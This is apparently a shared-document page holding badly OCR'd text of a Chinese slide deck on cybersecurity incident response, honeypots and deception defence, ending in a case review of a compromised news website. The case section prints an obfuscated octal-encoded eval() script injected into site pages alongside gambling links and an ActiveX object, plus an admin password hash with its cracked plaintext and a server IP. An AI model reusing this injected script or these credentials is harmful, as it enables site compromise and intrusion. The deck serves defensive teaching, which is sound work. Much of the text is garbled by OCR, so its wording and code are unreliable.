《2022网络安全应急响应.docx》由会员分享,可在线阅读,更多相关《2022网络安全应急响应.docx(41页珍藏版)》请在课桌文档上搜索。
1、网络安全应急响应的难点融合之道在网络安全应急响应中的应用和协同网络安全应急晌应案例复盘犬及引4有倚患/多年从事亍网络安全工作,今天主要不大家共同交流和探讨网络安全应急方面的相关见解和想法,抛砖引玉,不大家一起共同提升网络安全应急的能力;,了解网络安全应急响应的难点(ZN行助让我们更加了解到网络安全应急响应的短板);,网络空间安全态势感知在应急响应中如何发挥作用;,初步了解诱骗防御技术;,复盘一个案例,让大家了解攻击方就在眼前,只是你开知道而已。网络攻击的兀确定性/何时打响?(时间的JT确定,攻击者一定TT会告诉你我什么时候对你的信息系统发励攻击。),摧毁的目标?(目标的TT确定,信息系统庞大,
2、无法掌插攻击者攻击的目标。重要资产?一般资产?跳转又导致目标摧毁。)/用什么武器?(武器的TT确定,利用已知漏洞的武器?还是未知漏洞的武器?还是其他?)/敌人一定是发现了你的弱项,准备充分,才发生成争。(励力环境、应用系统数据库系统等可能存在的弱项;戒者挖了一个某应用的未公开漏洞等等。),党的十九届四中全会决议指出:构建统一指挥.专常兼备.反应上下联励的应急管理体制,优化国家应急管理能力体系建设,提高防灾减灾救灾能力;/2020年疫情的快速控制,这不跨部门、跨层级、跨机构、跨领域的协同分JT开的,开快速在应急准备、处置救援、恢复重建等方面组织落实保障;/网络安全应急响应的前提同样是需要拥有完善
3、的应急管理体系,至少包括组织、协祠、预案、演练、恢复等相关制度、流程等,才能做好网络安全应急管理;/建设网络安全应急管理体系开能仅仅只应付国家合规性要求,需要切实行励起来,而丐要保障体系可落地、可操作、可执行。难以在真实场景进行应急演练/升同行业重视应急演练:如消防应急演练、危险化学品事故应急演练、生命急救应急演练等;/网络安全行业同样重视应急演练,制定应急演练方案;,注重应急演练环境的真实性,网络安全事故是通过天灾和人祸导致(safety,security),演练环境围绕这些因素展开设计,做到成时TT慌开乱,应急响应井井有条;/杜绝形式上的网络安全应急演练,很多单位每年都演练,然后攻击者迎家
4、门开清楚,OA服务器成为养马场也开知道,数据在暗网售卖浑然开知;/通过桌面推演熟悉应急管理体系,成时知道如何应急;真实环境演练提升应急响应水平,快速控制风网络安全应急晌应案例复盘网络安全应急响应之我见融合之道在网络安全应急响应中的应用和协同融合才能构建千里眼”和顺风耳”/HW行励让我们认识到应急响应的前提是需要构建完善的监测雷达,构建千里眼和顺风耳;/技槐恰,提升新形势下监测雷达的能力:对(CSA)网络空间安全态势感知系统、(Honeypot)蜜罐系统、(ThreatIntelligence)威胁情报系统、(IDS)入侵检测系统、APT检测系统通行融合,以CSA为核心,结合威胁情报,入侵检测技
5、术,APT检测技术,使用诱骗防御手段,对攻击者通行干扰,掌插攻击手法、攻击武器,提前监测预警,达到更加精准的应急响应;/管理融合,增强应急响应的管控能力:事前、事中、事后的行励通过信息化的手段实现,实现全流程学系统情报系统/(ThreatIntelligence)窗/BS入侵检测系统/伊&T)入侵检测系统54的整体思想以大数据平台为依托,通过不同探针全流量采集数据,同时收集主机、网络、应用、安全设备、密码设备、保密设备等事件和日志,使用机器学习、语义网络、关联分析、情报分析、数据挖掘等不同分析方法,结合国家网络空间战略需求,提供网站安全、商业秘密、商用密码、工控安全、网络攻防等多维度、全方位的
6、态势感知,打造监测、预警、研判、通班处置、反馈、验证一体化的应急响应管理中心。SX的大数据平台架构事件态势资产态势漏洞态势!攻击溯源!泄露告警却受控告警喉库告警!越权告警Hbase实时查询EIasticSearch数据中心实时监测中心(FZnk)隐秘通信进程控制(F-Ume)离线分析中心(CDH)hiveIsparkYARN网络态势感知是建立从底层数据获取开始,加强分析及信息共享的能力;用于网络安全领域,解决网络空间的安全问题,发现海量数据的攻击行为、泄密行为、攻击溯源、违规操作行为等。GA建设的注意事项/CSA建设要重点考虑应急响应体系,即应急响应体系一定要纳入到CSA的建设过程和使用过程;
7、/考虑如何将事前、事中、事后三个阶段在管理过程中以信息化的方式实现,当然技术阶段也会考虑三个除段;管理制度化、制度流程化、流程表单化、表单信息化。/监测范围的设计,探针部署的设计,平台部署的设计;/资产梳理是CSA建设的重要步骤,哪些资产需要纳入到监测体系;/数据接入是CSA建设的关键步骤,如哪些数据需要接入,需要开需要接入门禁数据、励环数据、身份数据、挂纹数据等,未授权人员以社会工程学的名义速入机房,第一时间就会被发现等;/人工智能、大数据在CSA的某方面会发挥独特的作用,但是JT能完全依赖这些技术;/不外界情报对接,有蜜罐的情况下,可以将蜜罐的数据安全的对接到平台上。/安全服务人员一定要帮
8、劣用户优化规则模型,开教会用户人员,用户人员通过一个视图洞察网络里发生的故事。提升自信/态势感知系统)威胁情报系统主流安全产品/(54)网络空间安全;/fHoneypot)蜜罐系/(ThreatIntelligence/2S入侵检测系统/30入侵防护系统蜜罐的Honeypot:首次出现在BlttStOIlyCuckoo9SEgg,(1990)口蜜网项目组给出如下定义-tiAsecurityresourcewhojsvalueliesinbeingprobedjattackedorcompromised,j-没有业务上的用途,因此所有流入/流出蜜罐的流量都预示着扫描、攻击及攻陷;-用以监视、检测
9、和分析攻击;Gartner对欺骗伪装技术定义为:-使用骗局戒假励作来阻挠戒推翻攻击者的认知过程,扰乱攻击者的自励化工具;延迟戒阻断攻击者的活励,通过使用虚假的响应、有意混淆,以假励作、误导等伪造信息达到欺骗的目的。-对攻击者活励通行收集口一个体系框架-包括一个戒多个蜜罐-高可控的蜜罐网络口数据控制-降低风险-使得蜜网开会被用以危害第三方口数据捕获-检测开捕获所有攻击者的活励口数据分析-分析攻击者做了什么!HoneypotHoneypotHoneypot192.168.1.101192.168.1.102192.168.1.103蜜罐分类根据部署目的),产品型蜜罐:为一个组织的网络提供安全保护,
10、包括检测攻击、防止攻击造成破坏及帮劣管理员对攻击做出及时正确的成畲碗等功能。 较容易部署;口 JT需要管理员投入大量的工作; 开源工具如DTK、honeyd;商业产品如KFSenSor、Mantrap;,研究性蜜罐:与门用亍对黑客攻击的捕获和分析,通过部署研究型蜜罐对黑客攻击通行追踪和分析能够捕获黑客的击键记录,IJ解到黑客所使用的攻击工具及攻击方法;研究型蜜罐需要研究人员投入大量的时间和精力速行攻击监视和分析工作口具有代表性的工具是蜜网项目组所推出的第二代蜜网技术;蜜罐分类(根据交互级别)低交互蜜罐:提供一些模拟服务来吸引黑客攻击,过而转移黑客对受保护网络的注意力,达到保护网络的目的D如开源
11、的蜜罐Honeyd,最简单的情况就是使用一个监听器在特定端口通行监听;(模拟的TS2协议栈、模拟的服务&漏洞).中交互蜜罐:是在受限的安全环境中提供真实服务。攻击者可以不蜜罐提供的真实服务通行交互旦是由亍在一个受限的环境中,所以即使攻击者攻陷了该蜜罐也JT可能得到系统的控制权;不低交互蜜罐JT同的是中交互蜜罐提供磔飒第,所以攻击者很难检测出其真实性。高交互蜜罐提供真实的操作系统和服务,攻击者可以完全地不操作系统和真实的服务速行交互,所以这种蜜罐可以获得更多的攻击信息包括成功入侵后所迎行的攻击行励。通过对这些信息通行分析和建模D我们可以统计出攻击者的攻击步骤和轮廓以便识别和预测攻击.为由颤短蝎站
12、良方给砒(真实的系统&应用&漏洞,数据捕获、分析、控制).开源蜜罐软件介绍/OPenCanary:2015年,blackhat在单独发布环节推出的的一款低交互蜜罐工具,2019年开源;适合部署在局域网,用来检测来自攻击者横向移励阶段的扫描;支持16种协议;识别24种攻击特征;后台可统计ftp登录尝试、h即访问请求、http登录请求、SSh建立连接mssql登录、SqI账户认证等;由服务端和Agent两部分构成。/C。Wrie:SSH蜜罐,中交互蜜罐,用程序模拟一个SSH端口服务,让黑客认为是真实的SSH服务;能够捕获暴力攻击账号密码等记录,开通过欺骗环境记录入侵者的操作行为,包括输入命令、上传
13、戒下载恶意文件,适合放在处确来捕获一些恶意样本,扩充IOC库及提供给分析师分析。MHN(MOdemHoneyNetworkz现代蜜网:简化了蜜罐的部署,集成了多种蜜罐的安装脚本,可以快速部署、使用,也能够快速的从节点收集数据,但是还需要手励安装多个系统sensor。/T-POT多蜜罐平台:基亍DoCker的高交互蜜罐平台,集成了ConPOt、CowriesDionaeaxHoneytraP等多个蜜罐,更加方便的通行蜜罐研究不数据捕获,安装一次系统,轻松使用里面多种蜜罐,开丐提供良好的可视化。龄居集蜜罐的优势高保真-高质量的小威-很小的误报率-很小的漏报率口捕获新的攻击及战术口并开是资源密集型口
14、部署十分简单蜜罐I蜜网的本质/对攻击方通行欺骗的技术,通过部署一些作为诱饵的主机、网络服务戒者信息提供给攻击者;,诱使攻击方对诱饵实施攻击,从而可以对攻击行为通行捕获和分析;,防御方了解攻击方所使用的工具不方法;,防御方推测攻击意图和励机,能够让防御方清晰的了解他们所面对的安全威胁,,防御方通过技术和管理手段来调整防护策略,增强实际系统的安全防护能力。提升应急响应能力蜜罐所带来的安全风险发现蜜罐- 黑客知道要避免迎入哪些系统- 向蜜罐反馈虚假、伪造的信息- 消除蜜罐的捏纹- 蜜罐-反蜜罐技术:博弈问题!口利用蜜罐攻击第三方- 期望黑客获得蜜罐的root权限- 黑客会将其用作危害第三方的跳板-
15、引入多层次的数据控制机制- 人为分析和干预网络安全应急响应的难点融合之道在网络安全应急响应中的应用和协同某新闻媒体单位网站扰照等保三级通行安全防护,购买了大量的网络安全防护设备,安全测试小组对该系统速行探测,发现该网站存在应用层漏洞(如SQ1.注入),通过利用该漏洞获取网站的管理后台,然后对该网站逆行恶意篡改、挂马及捏入暗链,攻击成功。Q01-PToolsS02-PTsite亡103-GRSitea04-信息安全研究a05-研究环境搭建囱06-远程维护管理a07-网尖上的遛客目08-安全漏洞研究白标褊度白搜索引拿包攻防推演家怎么在页面首页放一个视频之后我点击的时候就可以看?新版jeecmsv8
16、的改动很大,希望做得更好,持续关注中。我也要曾言专访仃度科学家徐伟:口度比谷歌的人工智能平台更易h手I2016-10-10四川理塘县发生4.9级地震震源深度19千米12016-09-23苹果研发神秘新设备:体积类似APPIeTV支持NFC蓝牙I2016-09-23海银系接盘时H时谜局待解:P2P业务惨淡收场多次被调I2016-09-23亚马逊股价首破800美元大关市值稳居全球上市公司第“樱花女神”评选大赛第12017-10-182015年度好声音评选12016-12-31最美志愿者评选12019-01-09男神女神主持选拔大赛2020-10-09工资收入问卷调查12016-09-30JEECM
17、S演示站改版用户问卷调杳I已结束四2016-09-23图说世界页中暴露关例们联系我们诚聘英才友情链接程序下载许可协议加入收藏设为首页Database:jeecmsv9Table:jo_user1entry+usernamepassword1admin6dc47cd8d457428d62098759cc88f0e8(Iqa2ws3ed)C0不安全210.45.123.111/jeeadmin/jeecms/index.do#/loginpythoncmeanquanqitawangzhan。不安全210.45.123.111/jeeadmin/jeecms/index.do#/resourcel
18、ist?name=%2Fr%2Fcms%2Fwww%2Fdefault%2Fimages8tnoceStr=5meanquanqitawangzhanJEECMS三Q工作台D内容OOOO栏目IliI数据中心只用户管理0运营辅助昭界面模板资源fit三pythondl-YY.jpg7KB2018-03-0610:14:55dl_top_btn.png2KB2018-03-0610:14:55download01.jpg115KB2018-03-0610:14:55Sds_banner.png50KB2018-11-1401:24:43ds_bj.png22KB2018-03-0610:14:55d
19、s_btn.png11KB2018-03-0610:14:55ds_btn_on.png11KB2018-03-0610:14:55error-in.png2KB2018-03-0610:14:55first-pic.jpg6KB2018-03-0610:14:55gmcs.png2KB2018-03-0610:14:55gmsj.png2KB2018-03-0610:14:55JH100px;height:-10Opx;display:none;language=JavaScrlptMevalC1461651561431641511571564010315115314550514017315
20、12X166141162401031511531451611616567656566626760704075401651561451631431411601455(M2451656564105102451656765701024516570102631034240531512004040404040404040404245165636567644516560636770451656566106654516567667010245165606362604516563631066545U564711037142405315124CMO404v4(MO404040404042451651011046
21、46145165104102636345l656010663665l65616410210545l656370627(M5l656764106624516510361607042405315124C04040404040404040404245A165601041031024516510410160634516510510264604516563102A1051064516567651041064516565105105674516565105701024240531512(M(MO40404040404C4v40424516563624516566661(M10445165601037010
22、2VI51657010264102V451656110365105451651()4104603451656064701024240531512404040404040404(MO404CM24516560637()10245165103631036545165672675451656610466103451656610566106516566W6210545165661036610342V4053151240,v40404040404040404(MO42451656463606045165510363101451656214565654516567706665451656060666545
23、165103606363451656063666442VI0531512V104(MO40404040404040404245165636064604516560103677045165646070102V45165701026010345165611036704516570102101104451656070646(M240531512404040404040404040404042W5l65607110510245165646070M02l45165701046344516567103646(M516564607010245165716531034516570105102106424053
24、15M24(MO404040404040V40404042451650105641054516510570105103451651061067064451651061061061064516510510370634516570636064451656264621034240531512404004(MO404040404040424516510610663103451657W510460451651021066560451656110163664516567606210645M656610610570451651061061061064240531512404(M(MO404040404040
25、40424516570102106106451652646564451657010410610345165102101656245165104102636345165656365634516510510256224053151240404040404(MO404(M(MO424516565632644516510460106106451651021066510445165106105717045165W105701014516565631057045165106106110642V40531512404(MO404040404004(MO4251657063106106451656064105
26、103451656210370634516566S2626445165104601061064516567105102106451651056210470424053151240404(M040404(M040V40404245165105706763451651061066460V451651061061061065165106106656245165105701(MW45165106106104M5165106106106101057045165106106106106V205315124(MO40404040404040404042V451657063106106451656.64105
27、103451656210370634516566626264451651046010610645165671051021064516510521047042405315124040404040404040404040424516510570676345165106106646045165106106106106451651061066562451651057010404516510610610467516510610610610624053151242451656764667045165676067644516562146631414516567676214645165A67676767451
28、656760621454516566l66143451656765677l45165667l66145451562145676445l6566656614545l6562146676445l6566146666445l65661456767M5l65666562145516566656770425173l5l24040404040404C4016614116240103151153145167155407540165156145163143141160145504245165601036010345165W10360103425173151211166141162014616514315317
29、1157165M53141163160145162163i1531714O754O626O73151211166141162VK)146165153143171157165162151163151156147O754O14616514315317115716515314116316O1451621631531714O534O1O315115314516116165676565666267070561541451561471641507315121116715015115414540501031511531451671555615414515614716415040744014616515314
30、31711571651621511631511561475156147164150V405540146165153143171157165162151163151156147517315121116715015115414540501421541571431535615414515614716415(MO5340146165153143171157165162151163151156147V40744060170646C6060605140142M541571431534075VI014215415714315340534014215415714315340534014615115415414
31、2154157143153731512111661411624017116515514515640754015614516740101162162141171S517第161K1114N1571R7US111514n7K4C6V7a4mi5140V744CWWfiAnV7久46151VWBa5117R4M711EQ1SS1451fiim1511R54V754fM421E4157143M4fia4n1tM1511R314iR1161Fi5R75R6FCOview-source:210,45.123.111news113.jhtmlpythoncmeanquanqitawangzhan浏览含有恶意
32、代百家乐码的源代码娱乐城divStyle=visibility:hidden;“)澳门娱乐城brXobjectclassid=z/clsid:2F542A2E-EDC9-4BF7-8CBl-87C9919F7F9xevalC1461651561431641511571564010315115314550514017315121661411624010315115314516116451656564105102451656765701024516570102631034240531512404040404040404040404042451656365676445l(45165636310665
33、45165647110371424053151240404040404040404040404245165101104646145165104102636345l(24516510361607042405315124040404040404040404040424516560104103102451651041016063451651051026460V10570102424053151240404040404040404040404245165606362644o16566661041044516560103.701024516.5,70102205206207208209210211212
34、2132142152162175315124040404040404040404040424516560637010245165103631036545165676267654516566104661034516566:04040404040404040424516o6463606045165651036310145165621456565451656770666545165606066654516510340424516563606460451656010367704516564607010245165701026010345165611036760451657010210110445165
35、60,105102451656460701024516o70104636445165671036460451656460701024516571656310345165701051021064240o:5701051034516510610670644516510610610610645165105103706345165706360644516562646210342405315124040516510210665604516561101636645165676062106451656610610570451651061061061064240531512404040404040V06103
36、451651021016562451651041026363451656563656345165105102656242405315124040404040404040404040V0610571704516560105701014o1656563105704516o106106106106424053151240404040404040404040404245165701651046010610645165671051021064516o105621047042405315124040404040404040404040424o16510570676345:应急处置:锁定目标组组打开打印新建
37、文件夹floclost-access-log.2018-ll-15.txt一记事本登录操作系统查看应用日志I收藏夹M下载,桌面.最近访问的位置三库S视频G图片国文档J音乐1.计算机中网络,ComilIOnS-aemon.4uor1.gj.ogftcomons-daemon.2018-ll-14.log口host-Banager.2018Tl-O4.logj1host-manager.2018-ll-08.logIlhost-manager.2018-ll-14.logIlocalhost.2018Tl-O4.log二二1.J口二localhost,2018-11-05.Ios!.lgst.2018-ll-09.loglocalhost.2018-ll-13.log2222222222localhost.2018-11-15.log2localhost_access_log.2018-ll-04.txt2localhost_access_log.2018-ll-05.txt2localhost-access-lo.2018-ll-08.txt2loclhost_*ccss-log.2018-ll-09.txt2,localhost_access_log.2018-ll-14.txt2localhost_access_log.2018-